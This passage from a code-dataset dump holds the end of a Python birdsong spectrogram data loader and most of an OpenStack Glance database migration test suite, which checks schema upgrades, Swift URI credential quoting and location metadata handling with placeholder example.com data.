anti_aliasing=True, mode='reflect')\n\tspec = new_spec\n\t# Normalize.\n\tspec *= 0.9 / (np.max(spec) + EPSILON)\n\tspec += 0.05\n\treturn spec, t[1] - t[0]\n\n\ndef get_data_loaders(partition, params, batch_size=64, num_time_bins=128, \\\n\t\t\tshuffle=(True, False)):\n\tsongs_per_file = params['songs_per_file']\n\ttrain_dataset = SongDataset(filenames=partition['train'], \\\n\t\t\tparams=params,\n\t\t\ttransform=ToTensor(),\n\t\t\tsongs_per_file=songs_per_file)\n\ttrain_dataloader = DataLoader(train_dataset, batch_size=batch_size, \\\n\t\t\tshuffle=shuffle[0], num_workers=3)\n\tif not partition['test']:\n\t\treturn train_dataloader, None\n\ttest_dataset = SongDataset(filenames=partition['test'], \\\n\t\t\tparams=params,\n\t\t\ttransform=ToTensor(),\n\t\t\tsongs_per_file=songs_per_file)\n\ttest_dataloader = DataLoader(test_dataset, batch_size=batch_size, \\\n\t\t\tshuffle=shuffle[1], num_workers=3)\n\treturn train_dataloader, test_dataloader\n\n\n\nclass SongDataset(Dataset):\n\t\"\"\"Dataset for birdsongs\"\"\"\n\n\tdef __init__(self, filenames, params, songs_per_file=1000, transform=None):\n\t\tself.filenames = filenames\n\t\tself.p = params\n\t\tself.songs_per_file = songs_per_file\n\t\tself.transform = transform\n\n\n\tdef __len__(self):\n\t\treturn len(self.filenames) * self.songs_per_file\n\n\n\tdef __getitem__(self, index, start_frame=None, start_time=None):\n\t\tresult = []\n\t\tsingle_index = False\n\t\ttry:\n\t\t\titerator = iter(index)\n\t\t\tif start_frame is None:\n\t\t\t\tstart_frame = [None] * len(index)\n\t\t\tif start_time is None:\n\t\t\t\tstart_time = [None] * len(index)\n\t\texcept TypeError:\n\t\t\tindex = [index]\n\t\t\tstart_frame = [start_frame]\n\t\t\tstart_time = [start_time]\n\t\t\tsingle_index = True\n\t\tfor j, i in 
enumerate(index):\n\t\t\t# First find the file.\n\t\t\tload_filename = self.filenames[i // self.songs_per_file]\n\t\t\tfile_index = i % self.songs_per_file\n\t\t\t# Then collect fields from the file.\n\t\t\twith h5py.File(load_filename, 'r') as f:\n\t\t\t\tsample = {\n\t\t\t\t\t'audio': f['audio'][file_index],\n\t\t\t\t\t'time': f['time'][file_index],\n\t\t\t\t\t'file_time': f['file_time'][file_index],\n\t\t\t\t\t'filename': str(f['filename'][file_index]),\n\t\t\t\t\t'fs' : f['fs'][file_index]\n\t\t\t\t}\n\t\t\t\taudio_frames = int(sample['fs'] * self.p['spec_dur'])\n\t\t\t\tif start_frame[j] is None and start_time[j] is None:\n\t\t\t\t\tstart_frame[j] = random.randint(0, len(sample['audio']) - audio_frames)\n\t\t\t\telif start_time[j] is not None:\n\t\t\t\t\tstart_frame[j] = int(round(sample['fs'] * start_time[j]))\n\t\t\t\tspec, _ = get_spec(sample['audio'], start_frame[j], start_frame[j]+audio_frames, self.p, sample['fs'])\n\t\t\t\tsample['spec'] = spec\n\t\t\t\tdel sample['audio']\n\t\t\tif self.transform:\n\t\t\t\tsample = self.transform(sample)\n\t\t\tresult.append(sample)\n\t\tif single_index:\n\t\t\treturn result[0]\n\t\treturn result\n\n\n\nclass ToTensor(object):\n\n\tdef __call__(self, sample):\n\t\tspec = sample['spec']\n\t\tspec = torch.from_numpy(spec).type(torch.FloatTensor)\n\t\tsample['spec'] = spec\n\t\treturn sample\n\n\n\ndef mel(a):\n\treturn 1127 * np.log(1 + a / 700)\n\n\ndef inv_mel(a):\n\treturn 700 * (np.exp(a / 1127) - 1)\n\n\n\nif __name__ == '__main__':\n\tpass\n\n\n###\n","sub_path":"models/fixed_window_dataset.py","file_name":"fixed_window_dataset.py","file_ext":"py","file_size_in_byte":4599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
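The `mel`/`inv_mel` pair at the bottom of the file implements the common `1127 * ln(1 + f/700)` mel-scale formula, and the two functions should be exact inverses. A small check, assuming both functions are in scope:

```python
import numpy as np

freqs = np.array([100.0, 440.0, 8000.0])
assert np.allclose(inv_mel(mel(freqs)), freqs)  # round trip is the identity

# Mel spacing compresses high frequencies:
print(mel(np.array([1000.0, 2000.0, 4000.0])))  # approx. [1000.0, 1521.4, 2146.1]
```

This is why `get_spec` interpolates onto `inv_mel(linspace(mel(min_freq), mel(max_freq), ...))` when `p['mel']` is set: the resulting frequency bins are equally spaced on the mel scale rather than in Hz.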
+{"seq_id":"92995621","text":"# Copyright 2010-2011 OpenStack Foundation\n# All Rights Reserved.\n# Copyright 2013 IBM Corp.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nTests for database migrations. This test case reads the configuration\nfile /tests/unit/test_migrations.conf for database connection settings\nto use in the tests. For each connection found in the config file,\nthe test case runs a series of test cases to ensure that migrations work\nproperly both upgrading and downgrading, and that no data loss occurs\nif possible.\n\"\"\"\n\nfrom __future__ import print_function\n\nimport datetime\nimport os\nimport pickle\nimport uuid\n\nfrom migrate.versioning import api as migration_api\nfrom migrate.versioning.repository import Repository\nfrom oslo_config import cfg\nfrom oslo_db.sqlalchemy import test_base\nfrom oslo_db.sqlalchemy import test_migrations\nfrom oslo_db.sqlalchemy import utils as db_utils\nfrom oslo_serialization import jsonutils\nfrom oslo_utils import timeutils\n# NOTE(jokke): simplified transition to py3, behaves like py2 xrange\nfrom six.moves import range\nimport sqlalchemy\nfrom sqlalchemy import inspect\n\nfrom glance.common import crypt\nfrom glance.common import exception\nfrom glance.common import utils\nfrom glance.db import migration\nfrom glance.db.sqlalchemy import migrate_repo\nfrom glance.db.sqlalchemy.migrate_repo.schema import from_migration_import\nfrom glance.db.sqlalchemy import models\nfrom glance.db.sqlalchemy import models_artifacts\nfrom glance.db.sqlalchemy import models_metadef\n\nfrom glance import i18n\n\n_ = i18n._\n\nCONF = cfg.CONF\nCONF.import_opt('metadata_encryption_key', 'glance.common.config')\n\n\ndef index_exist(index, table, engine):\n inspector = sqlalchemy.inspect(engine)\n return index in [i['name'] for i in inspector.get_indexes(table)]\n\n\ndef unique_constraint_exist(constraint, table, engine):\n inspector = sqlalchemy.inspect(engine)\n return constraint in [c['name'] for c in\n inspector.get_unique_constraints(table)]\n\n\nclass MigrationsMixin(test_migrations.WalkVersionsMixin):\n @property\n def INIT_VERSION(self):\n return migration.INIT_VERSION\n\n @property\n def REPOSITORY(self):\n migrate_file = migrate_repo.__file__\n return Repository(os.path.abspath(os.path.dirname(migrate_file)))\n\n @property\n def migration_api(self):\n return migration_api\n\n @property\n def migrate_engine(self):\n return self.engine\n\n def test_walk_versions(self):\n # No more downgrades\n self._walk_versions(False, False)\n\n def _create_unversioned_001_db(self, engine):\n # Create the initial version of the images table\n meta = sqlalchemy.schema.MetaData()\n meta.bind = engine\n images_001 = sqlalchemy.Table('images', meta,\n sqlalchemy.Column('id', models.Integer,\n primary_key=True),\n sqlalchemy.Column('name',\n sqlalchemy.String(255)\n ),\n sqlalchemy.Column('type',\n sqlalchemy.String(30)),\n sqlalchemy.Column('size',\n sqlalchemy.Integer),\n sqlalchemy.Column('status',\n sqlalchemy.String(30)),\n 
sqlalchemy.Column('is_public',\n sqlalchemy.Boolean,\n default=False),\n sqlalchemy.Column('location',\n sqlalchemy.Text),\n sqlalchemy.Column('created_at',\n sqlalchemy.DateTime(),\n nullable=False),\n sqlalchemy.Column('updated_at',\n sqlalchemy.DateTime()),\n sqlalchemy.Column('deleted_at',\n sqlalchemy.DateTime()),\n sqlalchemy.Column('deleted',\n sqlalchemy.Boolean(),\n nullable=False,\n default=False),\n mysql_engine='InnoDB',\n mysql_charset='utf8')\n images_001.create()\n\n def test_version_control_existing_db(self):\n \"\"\"\n Creates a DB without version control information, places it\n under version control and checks that it can be upgraded\n without errors.\n \"\"\"\n self._create_unversioned_001_db(self.migrate_engine)\n\n old_version = migration.INIT_VERSION\n # we must start from version 1\n migration.INIT_VERSION = 1\n self.addCleanup(setattr, migration, 'INIT_VERSION', old_version)\n\n self._walk_versions(False, False)\n\n def _pre_upgrade_003(self, engine):\n now = datetime.datetime.now()\n images = db_utils.get_table(engine, 'images')\n data = {'deleted': False, 'created_at': now, 'updated_at': now,\n 'type': 'kernel', 'status': 'active', 'is_public': True}\n images.insert().values(data).execute()\n return data\n\n def _check_003(self, engine, data):\n images = db_utils.get_table(engine, 'images')\n self.assertNotIn('type', images.c,\n \"'type' column found in images table columns! \"\n \"images table columns reported by metadata: %s\\n\"\n % images.c.keys())\n images_prop = db_utils.get_table(engine, 'image_properties')\n result = images_prop.select().execute()\n types = []\n for row in result:\n if row['key'] == 'type':\n types.append(row['value'])\n self.assertIn(data['type'], types)\n\n def _pre_upgrade_004(self, engine):\n \"\"\"Insert checksum data sample to check if migration goes fine with\n data.\n \"\"\"\n now = timeutils.utcnow()\n images = db_utils.get_table(engine, 'images')\n data = [\n {\n 'deleted': False, 'created_at': now, 'updated_at': now,\n 'type': 'kernel', 'status': 'active', 'is_public': True,\n }\n ]\n engine.execute(images.insert(), data)\n return data\n\n def _check_004(self, engine, data):\n \"\"\"Assure that checksum data is present on table\"\"\"\n images = db_utils.get_table(engine, 'images')\n self.assertIn('checksum', images.c)\n self.assertEqual(32, images.c['checksum'].type.length)\n\n def _pre_upgrade_005(self, engine):\n now = timeutils.utcnow()\n images = db_utils.get_table(engine, 'images')\n data = [\n {\n 'deleted': False, 'created_at': now, 'updated_at': now,\n 'type': 'kernel', 'status': 'active', 'is_public': True,\n # Integer type signed size limit\n 'size': 2147483647\n }\n ]\n engine.execute(images.insert(), data)\n return data\n\n def _check_005(self, engine, data):\n\n images = db_utils.get_table(engine, 'images')\n select = images.select().execute()\n\n sizes = [row['size'] for row in select if row['size'] is not None]\n migrated_data_sizes = [element['size'] for element in data]\n\n for migrated in migrated_data_sizes:\n self.assertIn(migrated, sizes)\n\n def _pre_upgrade_006(self, engine):\n now = timeutils.utcnow()\n images = db_utils.get_table(engine, 'images')\n image_data = [\n {\n 'deleted': False, 'created_at': now, 'updated_at': now,\n 'type': 'kernel', 'status': 'active', 'is_public': True,\n 'id': 9999,\n }\n ]\n engine.execute(images.insert(), image_data)\n\n images_properties = db_utils.get_table(engine, 'image_properties')\n properties_data = [\n {\n 'id': 10, 'image_id': 9999, 'updated_at': now,\n 
'created_at': now, 'deleted': False, 'key': 'image_name'\n            }\n        ]\n        engine.execute(images_properties.insert(), properties_data)\n        return properties_data\n\n    def _check_006(self, engine, data):\n        images_properties = db_utils.get_table(engine, 'image_properties')\n        select = images_properties.select().execute()\n\n        # load names from the name column\n        image_names = [row['name'] for row in select]\n\n        # check that the keys from the inserted data appear in the name column\n        for element in data:\n            self.assertIn(element['key'], image_names)\n\n    def _pre_upgrade_010(self, engine):\n        \"\"\"Test rows in images with NULL updated_at get updated to equal\n        created_at.\n        \"\"\"\n\n        initial_values = [\n            (datetime.datetime(1999, 1, 2, 4, 10, 20),\n             datetime.datetime(1999, 1, 2, 4, 10, 30)),\n            (datetime.datetime(1999, 2, 4, 6, 15, 25),\n             datetime.datetime(1999, 2, 4, 6, 15, 35)),\n            (datetime.datetime(1999, 3, 6, 8, 20, 30),\n             None),\n            (datetime.datetime(1999, 4, 8, 10, 25, 35),\n             None),\n        ]\n\n        images = db_utils.get_table(engine, 'images')\n        for created_at, updated_at in initial_values:\n            row = dict(deleted=False,\n                       created_at=created_at,\n                       updated_at=updated_at,\n                       status='active',\n                       is_public=True,\n                       min_disk=0,\n                       min_ram=0)\n            images.insert().values(row).execute()\n\n        return initial_values\n\n    def _check_010(self, engine, data):\n        values = {c: u for c, u in data}\n\n        images = db_utils.get_table(engine, 'images')\n        for row in images.select().execute():\n            if row['created_at'] in values:\n                # updated_at should be unchanged if not previously NULL, or\n                # set to created_at if previously NULL\n                updated_at = values.pop(row['created_at']) or row['created_at']\n                self.assertEqual(row['updated_at'], updated_at)\n\n        # No initial values should be remaining\n        self.assertEqual(0, len(values))\n\n    def _pre_upgrade_012(self, engine):\n        \"\"\"Test that image ids change from int to varchar(32) and\n        values change from int to UUID. 
Also test image_members and\n        image_properties get updated to point to new UUID keys.\n        \"\"\"\n\n        images = db_utils.get_table(engine, 'images')\n        image_members = db_utils.get_table(engine, 'image_members')\n        image_properties = db_utils.get_table(engine, 'image_properties')\n\n        # Insert kernel, ramdisk and normal images\n        now = timeutils.utcnow()\n        data = {'created_at': now, 'updated_at': now,\n                'status': 'active', 'deleted': False,\n                'is_public': True, 'min_disk': 0, 'min_ram': 0}\n\n        test_data = {}\n        for name in ('kernel', 'ramdisk', 'normal'):\n            data['name'] = '%s migration 012 test' % name\n            result = images.insert().values(data).execute()\n            test_data[name] = result.inserted_primary_key[0]\n\n        # Insert image_members and image_properties rows\n        data = {'created_at': now, 'updated_at': now, 'deleted': False,\n                'image_id': test_data['normal'], 'member': 'foobar',\n                'can_share': False}\n        result = image_members.insert().values(data).execute()\n        test_data['member'] = result.inserted_primary_key[0]\n\n        data = {'created_at': now, 'updated_at': now, 'deleted': False,\n                'image_id': test_data['normal'], 'name': 'ramdisk_id',\n                'value': test_data['ramdisk']}\n        result = image_properties.insert().values(data).execute()\n        test_data['properties'] = [result.inserted_primary_key[0]]\n\n        data.update({'name': 'kernel_id', 'value': test_data['kernel']})\n        result = image_properties.insert().values(data).execute()\n        test_data['properties'].append(result.inserted_primary_key[0])\n\n        return test_data\n\n    def _check_012(self, engine, test_data):\n        images = db_utils.get_table(engine, 'images')\n        image_members = db_utils.get_table(engine, 'image_members')\n        image_properties = db_utils.get_table(engine, 'image_properties')\n\n        # Find kernel, ramdisk and normal images. Make sure id has been\n        # changed to a uuid\n        uuids = {}\n        for name in ('kernel', 'ramdisk', 'normal'):\n            image_name = '%s migration 012 test' % name\n            rows = images.select().where(\n                images.c.name == image_name).execute().fetchall()\n\n            self.assertEqual(1, len(rows))\n\n            row = rows[0]\n            self.assertTrue(utils.is_uuid_like(row['id']))\n\n            uuids[name] = row['id']\n\n        # Find all image_members to ensure image_id has been updated\n        results = image_members.select().where(\n            image_members.c.image_id == uuids['normal']).execute().fetchall()\n        self.assertEqual(1, len(results))\n\n        # Find all image_properties to ensure image_id has been updated\n        # as well as ensure kernel_id and ramdisk_id values have been\n        # updated too\n        results = image_properties.select().where(\n            image_properties.c.image_id == uuids['normal']\n        ).execute().fetchall()\n        self.assertEqual(2, len(results))\n        for row in results:\n            self.assertIn(row['name'], ('kernel_id', 'ramdisk_id'))\n\n            if row['name'] == 'kernel_id':\n                self.assertEqual(row['value'], uuids['kernel'])\n            if row['name'] == 'ramdisk_id':\n                self.assertEqual(row['value'], uuids['ramdisk'])\n\n    def _post_downgrade_012(self, engine):\n        images = db_utils.get_table(engine, 'images')\n        image_members = db_utils.get_table(engine, 'image_members')\n        image_properties = db_utils.get_table(engine, 'image_properties')\n\n        # Find kernel, ramdisk and normal images. 
Make sure id has been\n        # changed back to an integer\n        ids = {}\n        for name in ('kernel', 'ramdisk', 'normal'):\n            image_name = '%s migration 012 test' % name\n            rows = images.select().where(\n                images.c.name == image_name).execute().fetchall()\n            self.assertEqual(1, len(rows))\n\n            row = rows[0]\n            self.assertFalse(utils.is_uuid_like(row['id']))\n\n            ids[name] = row['id']\n\n        # Find all image_members to ensure image_id has been updated\n        results = image_members.select().where(\n            image_members.c.image_id == ids['normal']).execute().fetchall()\n        self.assertEqual(1, len(results))\n\n        # Find all image_properties to ensure image_id has been updated\n        # as well as ensure kernel_id and ramdisk_id values have been\n        # updated too\n        results = image_properties.select().where(\n            image_properties.c.image_id == ids['normal']).execute().fetchall()\n        self.assertEqual(2, len(results))\n        for row in results:\n            self.assertIn(row['name'], ('kernel_id', 'ramdisk_id'))\n\n            if row['name'] == 'kernel_id':\n                self.assertEqual(row['value'], str(ids['kernel']))\n            if row['name'] == 'ramdisk_id':\n                self.assertEqual(row['value'], str(ids['ramdisk']))\n\n    def _assert_invalid_swift_uri_raises_bad_store_uri(self,\n                                                       legacy_parse_uri_fn):\n        invalid_uri = ('swift://http://acct:usr:pass@example.com'\n                       '/container/obj-id')\n        # URI cannot contain more than one occurrence of a scheme.\n        self.assertRaises(exception.BadStoreUri,\n                          legacy_parse_uri_fn,\n                          invalid_uri,\n                          True)\n\n        invalid_scheme_uri = ('http://acct:usr:pass@example.com'\n                              '/container/obj-id')\n        self.assertRaises(AssertionError,\n                          legacy_parse_uri_fn,\n                          invalid_scheme_uri,\n                          True)\n\n        invalid_account_missing_uri = 'swift+http://container/obj-id'\n        # Badly formed Swift URI: swift+http://container/obj-id\n        self.assertRaises(exception.BadStoreUri,\n                          legacy_parse_uri_fn,\n                          invalid_account_missing_uri,\n                          True)\n\n        invalid_container_missing_uri = ('swift+http://'\n                                         'acct:usr:pass@example.com/obj-id')\n        # Badly formed Swift URI: swift+http://acct:usr:pass@example.com/obj-id\n        self.assertRaises(exception.BadStoreUri,\n                          legacy_parse_uri_fn,\n                          invalid_container_missing_uri,\n                          True)\n\n        invalid_object_missing_uri = ('swift+http://'\n                                      'acct:usr:pass@example.com/container')\n        # Badly formed Swift URI: swift+http://acct:usr:pass@example.com/container\n        self.assertRaises(exception.BadStoreUri,\n                          legacy_parse_uri_fn,\n                          invalid_object_missing_uri,\n                          True)\n\n        invalid_user_without_pass_uri = ('swift://acctusr@example.com'\n                                         '/container/obj-id')\n        # Badly formed credentials '%(creds)s' in Swift URI\n        self.assertRaises(exception.BadStoreUri,\n                          legacy_parse_uri_fn,\n                          invalid_user_without_pass_uri,\n                          True)\n\n        # Badly formed credentials in Swift URI.\n        self.assertRaises(exception.BadStoreUri,\n                          legacy_parse_uri_fn,\n                          invalid_user_without_pass_uri,\n                          False)\n\n    def test_legacy_parse_swift_uri_015(self):\n        (legacy_parse_uri,) = from_migration_import(\n            '015_quote_swift_credentials', ['legacy_parse_uri'])\n\n        uri = legacy_parse_uri(\n            'swift://acct:usr:pass@example.com/container/obj-id',\n            True)\n        self.assertEqual('swift://acct%3Ausr:pass@example.com'\n                         '/container/obj-id', uri)\n\n        self._assert_invalid_swift_uri_raises_bad_store_uri(legacy_parse_uri)\n\n    def _pre_upgrade_015(self, engine):\n        images = db_utils.get_table(engine, 'images')\n        unquoted_locations = [\n            'swift://acct:usr:pass@example.com/container/obj-id',\n            'file://foo',\n        ]\n        now = datetime.datetime.now()\n        temp = dict(deleted=False,\n                    created_at=now,\n                    updated_at=now,\n                    status='active',\n                    is_public=True,\n                    min_disk=0,\n                    min_ram=0)\n        data = []\n        
for i, location in enumerate(unquoted_locations):\n            temp.update(location=location, id=str(uuid.uuid4()))\n            data.append(temp.copy())  # copy; temp is reused and mutated each pass\n            images.insert().values(temp).execute()\n        return data\n\n    def _check_015(self, engine, data):\n        images = db_utils.get_table(engine, 'images')\n        quoted_locations = [\n            'swift://acct%3Ausr:pass@example.com/container/obj-id',\n            'file://foo',\n        ]\n        result = images.select().execute()\n        # a list, not map(): a py3 map iterator would be exhausted by the\n        # first assertIn below\n        locations = [x['location'] for x in result]\n        for loc in quoted_locations:\n            self.assertIn(loc, locations)\n\n    def _pre_upgrade_016(self, engine):\n        images = db_utils.get_table(engine, 'images')\n        now = datetime.datetime.now()\n        temp = dict(deleted=False,\n                    created_at=now,\n                    updated_at=now,\n                    status='active',\n                    is_public=True,\n                    min_disk=0,\n                    min_ram=0,\n                    id='fake-image-id1')\n        images.insert().values(temp).execute()\n        image_members = db_utils.get_table(engine, 'image_members')\n        now = datetime.datetime.now()\n        data = {'deleted': False,\n                'created_at': now,\n                'member': 'fake-member',\n                'updated_at': now,\n                'can_share': False,\n                'image_id': 'fake-image-id1'}\n        image_members.insert().values(data).execute()\n        return data\n\n    def _check_016(self, engine, data):\n        image_members = db_utils.get_table(engine, 'image_members')\n        self.assertIn('status', image_members.c,\n                      \"'status' column found in image_members table \"\n                      \"columns! image_members table columns: %s\"\n                      % image_members.c.keys())\n\n    def test_legacy_parse_swift_uri_017(self):\n        metadata_encryption_key = 'a' * 16\n        CONF.set_override('metadata_encryption_key', metadata_encryption_key)\n        self.addCleanup(CONF.reset)\n        (legacy_parse_uri, encrypt_location) = from_migration_import(\n            '017_quote_encrypted_swift_credentials', ['legacy_parse_uri',\n                                                      'encrypt_location'])\n\n        uri = legacy_parse_uri('swift://acct:usr:pass@example.com'\n                               '/container/obj-id', True)\n        self.assertTrue(uri, encrypt_location(\n            'swift://acct%3Ausr:pass@example.com/container/obj-id'))\n\n        self._assert_invalid_swift_uri_raises_bad_store_uri(legacy_parse_uri)\n\n    def _pre_upgrade_017(self, engine):\n        metadata_encryption_key = 'a' * 16\n        CONF.set_override('metadata_encryption_key', metadata_encryption_key)\n        self.addCleanup(CONF.reset)\n        images = db_utils.get_table(engine, 'images')\n        unquoted = 'swift://acct:usr:pass@example.com/container/obj-id'\n        encrypted_unquoted = crypt.urlsafe_encrypt(\n            metadata_encryption_key,\n            unquoted, 64)\n        data = []\n        now = datetime.datetime.now()\n        temp = dict(deleted=False,\n                    created_at=now,\n                    updated_at=now,\n                    status='active',\n                    is_public=True,\n                    min_disk=0,\n                    min_ram=0,\n                    location=encrypted_unquoted,\n                    id='fakeid1')\n        images.insert().values(temp).execute()\n\n        locations = [\n            'file://ab',\n            'file://abc',\n            'swift://acct3A%foobar:pass@example.com/container/obj-id2'\n        ]\n\n        now = datetime.datetime.now()\n        temp = dict(deleted=False,\n                    created_at=now,\n                    updated_at=now,\n                    status='active',\n                    is_public=True,\n                    min_disk=0,\n                    min_ram=0)\n        for i, location in enumerate(locations):\n            temp.update(location=location, id=str(uuid.uuid4()))\n            data.append(temp.copy())\n            images.insert().values(temp).execute()\n        return data\n\n    def _check_017(self, engine, data):\n        metadata_encryption_key = 'a' * 16\n        quoted = 'swift://acct%3Ausr:pass@example.com/container/obj-id'\n        images = db_utils.get_table(engine, 'images')\n        result = images.select().execute()\n        locations = map(lambda x: x['location'], result)\n        actual_location = []\n        for location in locations:\n            if location:\n                try:\n                    temp_loc = crypt.urlsafe_decrypt(metadata_encryption_key,\n                                                     location)\n                    
actual_location.append(temp_loc)\n                except TypeError:\n                    actual_location.append(location)\n                except ValueError:\n                    actual_location.append(location)\n\n        self.assertIn(quoted, actual_location)\n        loc_list = ['file://ab',\n                    'file://abc',\n                    'swift://acct3A%foobar:pass@example.com/container/obj-id2']\n\n        for location in loc_list:\n            if location not in actual_location:\n                self.fail(_(\"location: %s data lost\") % location)\n\n    def _pre_upgrade_019(self, engine):\n        images = db_utils.get_table(engine, 'images')\n        now = datetime.datetime.now()\n        base_values = {\n            'deleted': False,\n            'created_at': now,\n            'updated_at': now,\n            'status': 'active',\n            'is_public': True,\n            'min_disk': 0,\n            'min_ram': 0,\n        }\n        data = [\n            {'id': 'fake-19-1', 'location': 'http://glance.example.com'},\n            # NOTE(bcwaldon): images with a location of None should\n            # not be migrated\n            {'id': 'fake-19-2', 'location': None},\n        ]\n        # Apply base_values in a plain loop; under py3 a bare map() call is\n        # lazy and would never run the updates.\n        for image in data:\n            image.update(base_values)\n            images.insert().values(image).execute()\n        return data\n\n    def _check_019(self, engine, data):\n        image_locations = db_utils.get_table(engine, 'image_locations')\n        records = image_locations.select().execute().fetchall()\n        locations = {il.image_id: il.value for il in records}\n        self.assertEqual('http://glance.example.com',\n                         locations.get('fake-19-1'))\n\n    def _check_020(self, engine, data):\n        images = db_utils.get_table(engine, 'images')\n        self.assertNotIn('location', images.c)\n\n    def _pre_upgrade_026(self, engine):\n        image_locations = db_utils.get_table(engine, 'image_locations')\n\n        now = datetime.datetime.now()\n        image_id = 'fake_id'\n        url = 'file:///some/place/onthe/fs'\n\n        images = db_utils.get_table(engine, 'images')\n        temp = dict(deleted=False,\n                    created_at=now,\n                    updated_at=now,\n                    status='active',\n                    is_public=True,\n                    min_disk=0,\n                    min_ram=0,\n                    id=image_id)\n        images.insert().values(temp).execute()\n\n        temp = dict(deleted=False,\n                    created_at=now,\n                    updated_at=now,\n                    image_id=image_id,\n                    value=url)\n        image_locations.insert().values(temp).execute()\n        return image_id\n\n    def _check_026(self, engine, data):\n        image_locations = db_utils.get_table(engine, 'image_locations')\n        results = image_locations.select().where(\n            image_locations.c.image_id == data).execute()\n\n        r = list(results)\n        self.assertEqual(1, len(r))\n        self.assertEqual('file:///some/place/onthe/fs', r[0]['value'])\n        self.assertIn('meta_data', r[0])\n        x = pickle.loads(r[0]['meta_data'])\n        self.assertEqual({}, x)\n\n    def _check_027(self, engine, data):\n        table = \"images\"\n        index = \"checksum_image_idx\"\n        columns = [\"checksum\"]\n\n        meta = sqlalchemy.MetaData()\n        meta.bind = engine\n\n        new_table = sqlalchemy.Table(table, meta, autoload=True)\n\n        index_data = [(idx.name, idx.columns.keys())\n                      for idx in new_table.indexes]\n\n        self.assertIn((index, columns), index_data)\n\n    def _check_028(self, engine, data):\n        owner_index = \"owner_image_idx\"\n        columns = [\"owner\"]\n\n        images_table = db_utils.get_table(engine, 'images')\n\n        index_data = [(idx.name, idx.columns.keys())\n                      for idx in images_table.indexes\n                      if idx.name == owner_index]\n\n        self.assertIn((owner_index, columns), index_data)\n\n    def _post_downgrade_028(self, engine):\n        owner_index = \"owner_image_idx\"\n        columns = [\"owner\"]\n\n        images_table = db_utils.get_table(engine, 'images')\n\n        index_data = [(idx.name, idx.columns.keys())\n                      for idx in images_table.indexes\n                      if idx.name == owner_index]\n\n        self.assertNotIn((owner_index, columns), index_data)\n\n    def _pre_upgrade_029(self, engine):\n        image_locations = 
db_utils.get_table(engine, 'image_locations')\n\n        meta_data = {'somelist': ['a', 'b', 'c'], 'avalue': 'hello',\n                     'adict': {}}\n\n        now = datetime.datetime.now()\n        image_id = 'fake_029_id'\n        url = 'file:///some/place/onthe/fs029'\n\n        images = db_utils.get_table(engine, 'images')\n        temp = dict(deleted=False,\n                    created_at=now,\n                    updated_at=now,\n                    status='active',\n                    is_public=True,\n                    min_disk=0,\n                    min_ram=0,\n                    id=image_id)\n        images.insert().values(temp).execute()\n\n        pickle_md = pickle.dumps(meta_data)\n        temp = dict(deleted=False,\n                    created_at=now,\n                    updated_at=now,\n                    image_id=image_id,\n                    value=url,\n                    meta_data=pickle_md)\n        image_locations.insert().values(temp).execute()\n\n        return meta_data, image_id\n\n    def _check_029(self, engine, data):\n        meta_data = data[0]\n        image_id = data[1]\n        image_locations = db_utils.get_table(engine, 'image_locations')\n\n        records = image_locations.select().where(\n            image_locations.c.image_id == image_id).execute().fetchall()\n\n        for r in records:\n            d = jsonutils.loads(r['meta_data'])\n            self.assertEqual(d, meta_data)\n\n    def _post_downgrade_029(self, engine):\n        image_id = 'fake_029_id'\n\n        image_locations = db_utils.get_table(engine, 'image_locations')\n\n        records = image_locations.select().where(\n            image_locations.c.image_id == image_id).execute().fetchall()\n\n        for r in records:\n            md = r['meta_data']\n            d = pickle.loads(md)\n            self.assertIsInstance(d, dict)\n\n    def _check_030(self, engine, data):\n        table = \"tasks\"\n        index_type = ('ix_tasks_type', ['type'])\n        index_status = ('ix_tasks_status', ['status'])\n        index_owner = ('ix_tasks_owner', ['owner'])\n        index_deleted = ('ix_tasks_deleted', ['deleted'])\n        index_updated_at = ('ix_tasks_updated_at', ['updated_at'])\n\n        meta = sqlalchemy.MetaData()\n        meta.bind = engine\n\n        tasks_table = sqlalchemy.Table(table, meta, autoload=True)\n\n        index_data = [(idx.name, idx.columns.keys())\n                      for idx in tasks_table.indexes]\n\n        self.assertIn(index_type, index_data)\n        self.assertIn(index_status, index_data)\n        self.assertIn(index_owner, index_data)\n        self.assertIn(index_deleted, index_data)\n        self.assertIn(index_updated_at, index_data)\n\n        expected = [u'id',\n                    u'type',\n                    u'status',\n                    u'owner',\n                    u'input',\n                    u'result',\n                    u'message',\n                    u'expires_at',\n                    u'created_at',\n                    u'updated_at',\n                    u'deleted_at',\n                    u'deleted']\n\n        # NOTE(flwang): Skip the column type checking for now since Jenkins is\n        # using sqlalchemy.dialects.postgresql.base.TIMESTAMP instead of\n        # DATETIME which is used by mysql and sqlite.\n        col_data = [col.name for col in tasks_table.columns]\n        self.assertEqual(expected, col_data)\n\n    def _post_downgrade_030(self, engine):\n        self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n                          db_utils.get_table, engine, 'tasks')\n\n    def _pre_upgrade_031(self, engine):\n        images = db_utils.get_table(engine, 'images')\n        now = datetime.datetime.now()\n        image_id = 'fake_031_id'\n        temp = dict(deleted=False,\n                    created_at=now,\n                    updated_at=now,\n                    status='active',\n                    is_public=True,\n                    min_disk=0,\n                    min_ram=0,\n                    id=image_id)\n        images.insert().values(temp).execute()\n\n        locations_table = db_utils.get_table(engine, 'image_locations')\n        locations = [\n            ('file://ab', '{\"a\": \"yo yo\"}'),\n            ('file://ab', '{}'),\n            ('file://ab', '{}'),\n            ('file://ab1', '{\"a\": \"that one, please\"}'),\n            ('file://ab1', '{\"a\": \"that one, please\"}'),\n        ]\n        temp = dict(deleted=False,\n                    created_at=now,\n                    updated_at=now,\n                    image_id=image_id)\n\n        for location, metadata in locations:\n            temp.update(value=location, meta_data=metadata)\n            
